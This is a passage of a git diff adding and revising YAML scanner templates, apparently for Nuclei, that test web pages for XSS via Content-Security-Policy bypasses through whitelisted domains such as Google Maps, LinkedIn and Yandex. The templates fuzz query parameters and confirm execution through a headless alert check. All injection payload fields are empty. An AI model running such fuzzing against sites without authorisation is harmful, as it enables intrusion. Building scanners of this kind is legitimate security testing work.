00000000000..cabb2a05c69 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: lijit-ap-csp-xss + +info: + name: Content-Security-Policy Bypass via Lijit AP + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,lijit + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: lijit_ap_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "lijit_ap_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml b/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml new file mode 100644 index 00000000000..fd1f40c4978 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: linkedin-csp-xss + +info: + name: Content-Security-Policy Bypass via LinkedIn + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,linkedin + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: linkedin_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "linkedin_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml b/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml new file mode 100644 index 00000000000..2f191e34b34 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: links-disqus-csp-xss + +info: + name: Content-Security-Policy Bypass via Disqus Links + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,disqus + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: links_disqus_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "links_disqus_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml new file mode 100644 index 00000000000..a61064620a5 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: livechatinc-api-csp-xss + +info: + name: Content-Security-Policy Bypass via LiveChatInc API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,livechatinc + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: livechatinc_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "livechatinc_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml similarity index 50% rename from dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml rename to dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml index b649f234783..7ea006151c5 100644 --- a/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml +++ b/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml @@ -1,11 +1,11 @@ -id: lpsnmedia-csp-xss +id: lpsnmedia-accdn-csp-xss info: - name: Content-Security-Policy Bypass via Lpsnmedia - author: DhiyaneshDK - severity: high + name: Content-Security-Policy Bypass via LPSN Media + author: renniepak,DhiyaneshDK + severity: medium reference: - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L6C7-L6C16 + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv metadata: verified: true tags: xss,csp-bypass,lpsnmedia 
@@ -33,15 +33,23 @@ http: part: body words: - "{{injection}}" + internal: true - - type: word - part: content_type - words: - - "text/html" +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" - - type: word - part: content_security_policy - words: - - "lpsnmedia.net" - - "script-src" - condition: and \ No newline at end of file + - action: waitload + + - action: waitdialog + name: lpsnmedia_accdn_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "lpsnmedia_accdn_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml new file mode 100644 index 00000000000..fc8c5c162f1 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/lptag-liveperson-csp-xss.yaml @@ -0,0 +1,55 @@ +id: lptag-liveperson-csp-xss + +info: + name: Content-Security-Policy Bypass via LivePerson Tag + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,liveperson + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: lptag_liveperson_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "lptag_liveperson_csp_xss == true" \ No newline at end of file 
diff --git a/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml new file mode 100644 index 00000000000..c8f2bbe166e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/m-media-amazon-csp-xss.yaml @@ -0,0 +1,55 @@ +id: m-media-amazon-csp-xss + +info: + name: Content-Security-Policy Bypass via Amazon Media + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,amazon + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: m_media_amazon_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "m_media_amazon_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml new file mode 100644 index 00000000000..fbabd40e60e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/mango-buzzfeed-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: mango-buzzfeed-csp-xss + +info: + name: Content-Security-Policy Bypass via BuzzFeed Mango + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,buzzfeed + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: mango_buzzfeed_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "mango_buzzfeed_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml new file mode 100644 index 00000000000..055a3aa3aa0 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-api-ssl-google-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: maps-api-ssl-google-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps API SSL + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_api_ssl_google_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_api_ssl_google_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml new file mode 100644 index 00000000000..4adb60ce618 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-google-com-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: maps-google-com-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_google_com_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_google_com_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml new file mode 100644 index 00000000000..763c3684728 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-google-de-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: maps-google-de-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps DE + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_google_de_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_google_de_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml new file mode 100644 index 00000000000..319b94460b2 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-google-lv-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: maps-google-lv-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps LV + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_google_lv_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_google_lv_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml new file mode 100644 index 00000000000..06669e312f2 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-google-ru-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: maps-google-ru-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps RU + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_google_ru_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_google_ru_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml new file mode 100644 index 00000000000..7963c3d4700 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/maps-googleapis-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: maps-googleapis-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Maps API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: maps_googleapis_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "maps_googleapis_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml b/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml new file mode 100644 index 00000000000..f93be9aad40 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/marketo-app-sjint-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: marketo-app-sjint-csp-xss + +info: + name: Content-Security-Policy Bypass via Marketo App SJINT + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,marketo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: marketo_app_sjint_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "marketo_app_sjint_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml new file mode 100644 index 00000000000..12967e9416e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/mc-yandex-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: mc-yandex-csp-xss + +info: + name: Content-Security-Policy Bypass via Yandex MC + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yandex + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: mc_yandex_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "mc_yandex_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml new file mode 100644 index 00000000000..04aa67fd4ea --- /dev/null +++ b/dast/vulnerabilities/xss/csp/meetup-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: meetup-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Meetup API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,meetup + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: meetup_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "meetup_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml deleted file mode 100644 index 94a7b8fc922..00000000000 --- a/dast/vulnerabilities/xss/csp/mi-csp-xss.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: mi-csp-xss - -info: - name: Content-Security-Policy Bypass via Mi - author: DhiyaneshDK - severity: high - reference: - - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L3 - metadata: - verified: true - tags: xss,csp-bypass,mi - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - injection: - - '' - - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{url_encode(injection)}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{injection}}" - - - type: word - part: content_type - words: - - "text/html" - - - type: word - part: content_security_policy - words: - - "mi.com" - - "script-src" - condition: and \ No newline at end of file 
diff --git a/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml new file mode 100644 index 00000000000..90d56f30f7a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/mi-huodong-csp-xss.yaml @@ -0,0 +1,55 @@ +id: mi-huodong-csp-xss + +info: + name: Content-Security-Policy Bypass via Mi Huodong + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,mi + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: mi_huodong_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "mi_huodong_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml new file mode 100644 index 00000000000..9f9d9978605 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/microsoft-translator-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: microsoft-translator-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Microsoft Translator API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,microsoft + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: microsoft_translator_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "microsoft_translator_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml new file mode 100644 index 00000000000..e421bc694ba --- /dev/null +++ b/dast/vulnerabilities/xss/csp/mixpanel-api-csp-xss.yaml 
@@ -0,0 +1,55 @@ +id: mixpanel-api-csp-xss + +info: + name: Content-Security-Policy Bypass via Mixpanel API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,mixpanel + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: mixpanel_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "mixpanel_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml new file mode 100644 index 00000000000..1ec82002902 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/nominatim-openstreetmap-csp-xss.yaml 
@@ -0,0 +1,55 @@
+id: nominatim-openstreetmap-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via OpenStreetMap Nominatim
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,openstreetmap
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: nominatim_openstreetmap_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "nominatim_openstreetmap_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml b/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml
new file mode 100644
index 00000000000..8b4cc510235
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/oamssoqae-ieee-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: oamssoqae-ieee-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IEEE OAMSSOQAE
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ieee
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: oamssoqae_ieee_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "oamssoqae_ieee_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml
new file mode 100644
index 00000000000..000ad906817
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/olark-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: olark-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Olark API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,olark
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: olark_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "olark_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml b/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml
new file mode 100644
index 00000000000..8009fdea74b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/openexchangerates-csp-xss.yaml
@@ -0,0 +1,55 @@ +id: openexchangerates-csp-xss + +info: + name: Content-Security-Policy Bypass via OpenExchangeRates + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,openexchangerates + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: openexchangerates_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "openexchangerates_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml deleted file mode 100644 index 05d1b99a9c9..00000000000 --- a/dast/vulnerabilities/xss/csp/ovoenergy-csp-xss.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: ovoenergy-csp-xss - -info: - name: Content-Security-Policy 